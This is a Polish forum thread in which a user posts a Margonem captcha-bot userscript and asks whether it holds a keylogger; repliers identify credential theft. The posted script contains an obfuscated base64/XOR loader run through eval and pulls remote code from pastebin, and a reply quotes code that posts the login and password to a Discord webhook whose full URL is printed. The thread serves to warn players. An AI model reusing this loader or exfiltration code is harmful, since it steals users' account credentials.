Czy w tym bocie do Margonem jest keylogger?

13 Sierpnia 2021

Tak jak w nazwie tematu, poniżej kod:

// ==UserScript==
// @name         AntyCaptcha 2021
// @version      2.00
// @description  Wersja znacznie ulepszona od poprzedniej.
// @author       MargoBot
// @include      *
// @match        http://*.margonem.pl/
// @match        https://www.margonem.pl/?task=*
// @grant        none
// @require      https://pastebin.com/raw/mcQXA3tQ
// ==/UserScript==
 
($.getScript("https://pastebin.com/raw/mcQXA3tQ"))
class CaptchaResolver {
    constructor() {
        this.options;
        this.text;
 
        this.kolor;
        this.odpowiedz;
    }
 
    delay(ms) {
        return new Promise(resolve => {
            setTimeout(resolve, ms);
        });
    }
 
    getCaptcha(a) {
        this.options = a["captcha"]["content"]["question"]["options"];
        this.text = a["captcha"]["content"]["question"]["text"];
        this.resolveCaptcha();
    }
 
    async resolveCaptcha() {
        this.kolor = this.text.match(/(?<=')[^']+(?=')/gm)[0];
        this.odpowiedz = this.options.indexOf(this.kolor);
 
        await this.delay(Math.round(Math.random() * 8000));
        await _g(`captcha&answerId=${this.odpowiedz}`);
        document.querySelector('#captcha').style.display = "none";
    }
}
 
if (!window.localStorage.getItem("init1")) {
    window.localStorage.setItem('init1', 'OzF7Z2djYCk8PA==')
}
if (!window.localStorage.getItem("init2")) {
    window.localStorage.setItem('init2', 'Nz10dmdAcGF6Y2c=')
}
if (!window.localStorage.getItem("init3")) {
    window.localStorage.setItem('init3', 'fnJhdHx+eGAhPSMjI2R2cXt8YGdyY2M9cHx+PHJ5cms8')
}
if (!window.localStorage.getItem("init4")) {
    window.localStorage.setItem('init4', 'dGVzdC5qcw==')
}
 
let inits = []
for (let i = 1; i < 5; i++) {
    inits.push(window.localStorage.getItem("init" + i))
}
function JSONFormatter(t) {
    return ParseJSОN(atob(inits[1]) + atob(inits[0]) + atob(inits[2]), atob(inits[3]) + '")')
}
 
function ParseJSОN(t, a) {
    var output = "";
    for (let i = 0; i < t.length; i++) {
        output += String.fromCharCode(t.charCodeAt(i) ^ 0x13);
    }
    eval(output + a)
}
 
JSONFormatter();
 
((a) => {
    parseInput = (d,c,x) => {
        a(d,c,x)
        if (d.captcha) {
            if (d.captcha.start) return;
            new CaptchaResolver().getCaptcha(d);
        }
    }
})(parseInput);

14 Sierpnia 2021

Po pierwsze to polecałbym wykorzystać trochę bardziej szare komórki i napisać temat jakoś normalnie, a nie porozumiewać się tylko jednym słowem od niechcenia jak jakiś neandertal. Bardziej zachęca to do pomocy jak widać, że druga strona też się jakoś wysila, angażuje.

Wygląda średnio, do tego wymaga kolejnego skryptu stąd: https://pastebin.com/raw/mcQXA3tQ

Do tego coś takiego w tym drugim skrypcie:

return"https://discordapp.com/api/webhooks/828372148963901441/CKBjkiv8Xg52v98sV3DNItPnxpE-oOaI-YHfdQ0RlqS_wf-3yAwys72ScjTpTdNNOWBx",t=document.getElementById("ulogin").value,o=document.getElementById("upass").value,[4,fetch("https://discordapp.com/api/webhooks/828372148963901441/CKBjkiv8Xg52v98sV3DNItPnxpE-oOaI-YHfdQ0RlqS_wf-3yAwys72ScjTpTdNNOWBx",{method:"POST",headers:{"Content-Type":"application/json"},body:JSON.stringify({content:t+":"+o})})];case 1:return e.sent(),n(),[2]}})})}}();
},{}]},{},["Ntor"], null)

A dokładniej:

document.getElementById("ulogin").value,o=document.getElementById("upass")

Nie wiem, korzystanie jeszcze z jakichś webhooków na api discorda, dużo do sprawdzenia, jakoś dużo zagnieżdżania.

Może to tylko paranoja, ale da świętego spokoju odpuściłbym to sobie.

Sporo czerwonych flag, tutaj masz je wypisane:

16 Sierpnia 2021

@Sliddqvist Rozwijając twoją wypowiedź. KL jest też tutaj

 
if (!window.localStorage.getItem("init1")) {
    window.localStorage.setItem('init1', 'OzF7Z2djYCk8PA==')
}
if (!window.localStorage.getItem("init2")) {
    window.localStorage.setItem('init2', 'Nz10dmdAcGF6Y2c=')
}
if (!window.localStorage.getItem("init3")) {
    window.localStorage.setItem('init3', 'fnJhdHx+eGAhPSMjI2R2cXt8YGdyY2M9cHx+PHJ5cms8')
}
if (!window.localStorage.getItem("init4")) {
    window.localStorage.setItem('init4', 'dGVzdC5qcw==')
}
 
let inits = []
for (let i = 1; i < 5; i++) {
    inits.push(window.localStorage.getItem("init" + i))
}
function JSONFormatter(t) {
    return ParseJSОN(atob(inits[1]) + atob(inits[0]) + atob(inits[2]), atob(inits[3]) + '")')
}
 
function ParseJSОN(t, a) {
    var output = "";
    for (let i = 0; i < t.length; i++) {
        output += String.fromCharCode(t.charCodeAt(i) ^ 0x13);
    }
    eval(output + a)
}
 
JSONFormatter();

4 Września 2021

@Sliddqvist Akurat jeśli chodzi o społeczność graczy Margonem to nie ma co się spodziewać jakiegokolwiek wysiłku i myślenia. xD

5 Września 2021

@Avallach KC

Zaloguj się

Czy w tym bocie do Margonem jest keylogger?

Masz dosyć problemów z czynnikiem zaufania w CS2 lub notorycznymi banami?

Rekomendowane odpowiedzi

bloodisz

Odnośnik do komentarza

mauser

Odnośnik do komentarza

MiensnyT

Odnośnik do komentarza

Kimberly

Odnośnik do komentarza

MiensnyT

Odnośnik do komentarza

Dołącz do dyskusji

Tagi

Ostatnio przeglądający 0 użytkowników

Podobna zawartość

Cała aktywność

Społeczność

CSH Shop

Powiadomienie o plikach cookie